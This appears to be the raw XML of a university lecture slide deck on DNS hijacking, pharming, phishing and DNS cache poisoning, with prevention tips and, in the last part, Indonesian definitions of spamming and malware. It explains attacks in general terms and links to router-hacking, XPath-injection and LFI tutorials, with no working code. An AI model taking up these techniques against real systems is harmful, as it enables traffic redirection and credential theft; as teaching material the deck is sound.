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8" r:id="rId3"/>
    <p:sldId id="279" r:id="rId4"/>
    <p:sldId id="280" r:id="rId5"/>
    <p:sldId id="281" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="273" r:id="rId20"/>
    <p:sldId id="274" r:id="rId21"/>
    <p:sldId id="275" r:id="rId22"/>
    <p:sldId id="276" r:id="rId23"/>
    <p:sldId id="277"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5F783CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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4BF05-1101-463F-84AE-D54FAFAA5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9529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F783CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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3371819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F783CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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4BF05-1101-463F-84AE-D54FAFAA56CC}"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464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F783CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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1711395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F783CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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4BF05-1101-463F-84AE-D54FAFAA5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11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F783CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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3719939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F783CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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389469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F783CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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602237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783CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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3055735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83CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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4BF05-1101-463F-84AE-D54FAFAA56CC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368892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83CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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4BF05-1101-463F-84AE-D54FAFAA5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494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5F783CF-5B21-4923-A63B-CAF4BBF98BD3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/26/2016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6A4BF05-1101-463F-84AE-D54FAFAA56CC}"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46488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en.wikipedia.org/wiki/DNSChang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gohacking.com/hack-ethernet-adsl-route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orms.fbi.gov/check-to-see-if-your-computer-is-using-rogue-DN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thewindowsclub.com/online-identity-thef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thewindowsclub.com/flush-windows-dns-cach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technet.microsoft.com/en-us/library/ee683907(v=WS.10).aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/ff807360(v=WS.10).aspx" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/hh831411.asp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thewindowsclub.com/opendns-review" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.thewindowsclub.com/comodo-secure-dns-review"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curityidiots.com/Web-Pentest/XPATH-Injection/Basics-of-XPATH-for-XPATH-Injection-part-1.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://simonclausen.dk/projects/dnscrypt-winservicemgr/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://securityidiots.com/Web-Pentest/LFI/guide-to-lfi.ht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www.site.com/index.php?page=null" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.site.com/index.php?page=contacts.php"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en.wikipedia.org/wiki/Request_for_Comme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DNS HJACKING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Andrew_fiade@uinjkt.ac.id</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18515512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a:t>Pharming:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> This is a kind of attack where a website’s traffic is redirected to another website that is a fake one. For example, when a user tries to visit a social networking website such as Facebook.com he may be redirected to another website that is filled with pop-ups and advertisements. This is often done by hackers in order to generate advertising revenue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Phishing:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> This is a kind of attack where users are redirected to a malicious website whose design (look and feel) matches exactly with that of the original one. For example, when a user tries to log in to his bank account, he may be redirected to a malicious website that steals his login details.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3119992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Prevent DNS Hijacking?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>most cases, attackers make use of malware programs such as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> horse to carry out DNS hijacking. These DNS hijacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are often distributed as video and audio codecs, video downloaders, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>YoTube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> downloaders or as other free utilities. So, in order to stay protected, it is recommended to stay away from untrusted websites that offer free downloads. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>DNSChanger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an example of one such malware that hijacked the DNS settings of over 4 million computers to drive a profit of about 14 million USD through fraudulent advertising revenue.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130045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Also, it is necessary to change the default password of your router, so that it would not be possible for the attacker to modify your router settings using the default password that came with the factory setting. For more details on this topic you can read my other post on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>How to Hack an Ethernet ADSL Router</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installing a good antivirus program and keeping it up-to-date can offer a great deal of protection to your computer against any such attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2379003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if you are already a victim of DNS hijacking?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you suspect that your computer is infected with a malware program such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DNSChanger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you need not panic. It is fairly simple and easy to recover from the damage caused by such programs. All you have to do is, just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>verify your current DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> settings to make sure that you are not using any of those DNS IPs that are blacklisted. Otherwise re-configure your DNS settings as per the guidelines of your ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://forms.fbi.gov/check-to-see-if-your-computer-is-using-rogue-DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1976128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The most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>common method for DNS Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is to install a malware on your computer that changes the DNS so that whenever your browser tries to resolve an URL, it contacts one of the fake DNS servers instead of real DNS servers that are used by ICANN (authority of Internet that is responsible for registering domains, managing them, providing them with IP addresses, maintaining the contact addresses and more). The direct DNS servers that your computer contacts are the DNS servers being operated by your Internet Service Provider – unless you’ve changed them to something else. When an internet connection is bought, the DNS servers in use are of the ISP – recognized by ICANN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2493030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malware on your computer changes the default DNS trusted by your computer to point to some other IP address. That way, when your browser tries to resolve an IP address, your computer contacts a fake DNS server that gives you wrong IP address. This results in your browser loading a malicious website that may compromise your computer or steal your credentials etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="754677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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Poisoning the cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> means changing the real values of URLs. For example, cyber criminals can create a website that looks like say, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>xyz.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and enter its DNS record in your DNS cache. Thus, when you type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>xyz.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the address bar of the browser, the latter will pick up the IP address of the fake website and take you there, instead of the real website. Using this method, cyber criminals can phish out your login credentials and other information such as card details, social security number, phone numbers and more for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="online identity theft"/>
              </a:rPr>
              <a:t>identity theft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. The DNS poisoning is also done to inject malware into your computer or network. Once you land on a fake website using a poisoned DNS cache, the criminals can do anything they want.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes, instead of the local cache, criminals can also set up fake DNS servers so that when queried, they can give out fake IP addresses. This is high level DNS poisoning and corrupts most of the DNS caches in a particular area thereby affecting many more users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42406575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DNS Cache Spoofing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3825024" y="1825625"/>
            <a:ext cx="7528775" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS spoofing is a type of attack that involves impersonation of DNS server responses in order to introduce false information. In a spoofing attack, a malicious user attempts to guess that a DNS client or server has sent a DNS query and is waiting for a DNS response. A successful spoofing attack will insert a fake DNS response into the DNS server’s cache, a process known as cache poisoning. A spoofed DNS server has no way of verifying that DNS data is authentic, and will reply from its cache using the fake information.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="DNS Cache Poisoning and Spoof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89" y="2378354"/>
            <a:ext cx="3605055" cy="2605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1533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DNS Cache Spoofing sounds similar to DNS Cache Poisoning, but there is a small difference. DNS Cache Spoofing is a set of methods used to poison a DNS cache. This could be a forced entry to a computer network’s server to modify and manipulate the DNC cache. This could be setting up a fake DNS server so that fake responses are sent out when queried. There are many ways to poison a DNS cache and one of the common ways is DNS Cache Spoofing.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14090617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DNS Cache Poisoning – Prevention</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are not many methods available to prevent DNS Cache poisoning. The best method is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>scale up your security systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> so that no attacker can compromise your network and manipulate the local DNS cache. Use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can detect DNS cache poisoning attacks. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="flush or clear dns cache in windows"/>
              </a:rPr>
              <a:t>Clearing the DNS cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> frequently is also an option some of you may consider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>ipconfig /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>flushdns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ipconfig /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>displaydns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2328450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Definisi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Spamming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kegiatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server email yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open relay” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> spamming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>diartikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iklan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tempatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sangat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>Malcious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> Software)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
